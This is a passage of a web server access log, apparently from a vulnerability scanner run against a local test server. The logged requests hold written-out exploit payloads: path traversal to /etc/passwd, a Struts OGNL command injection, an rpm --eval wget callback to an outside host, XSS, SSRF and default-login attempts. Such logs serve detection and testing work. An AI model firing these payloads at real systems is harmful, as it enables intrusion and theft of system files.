HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:///example.com@example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1w83NQIL3dWfbFK3pZZaKd6.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://ca28fg0smpvbd3qg07h0mo87hbjhg85ep.oast.live%22)%7D' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/38 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SSI/Auth/ip_snmp.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/authentication_page.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22userReference\x22:{},\x22loginReference\x22:{\x22link\x22:\x22http://localhost/mgmt/shared/gossip\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/shared/authn/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /omni_success?cmdb_edit_path=\x22);alert('nuclei');// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hopfully404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/lifterlms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-file-manager-pro/fm_backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp-security-audit-log/failed-logins/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/XUI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lan.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://:80?@example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pandora_console/mobile/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/40 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /comm.php?id=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php?action=login&type=admin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appspec.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager?type=Files HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /am/UI/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"sgcgoogleanalytic=&sgcwebtools=&button=Save+Changes&action=savegooglecode","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/options-general.php?page=smartcode HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sess-bin/login_session.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:47 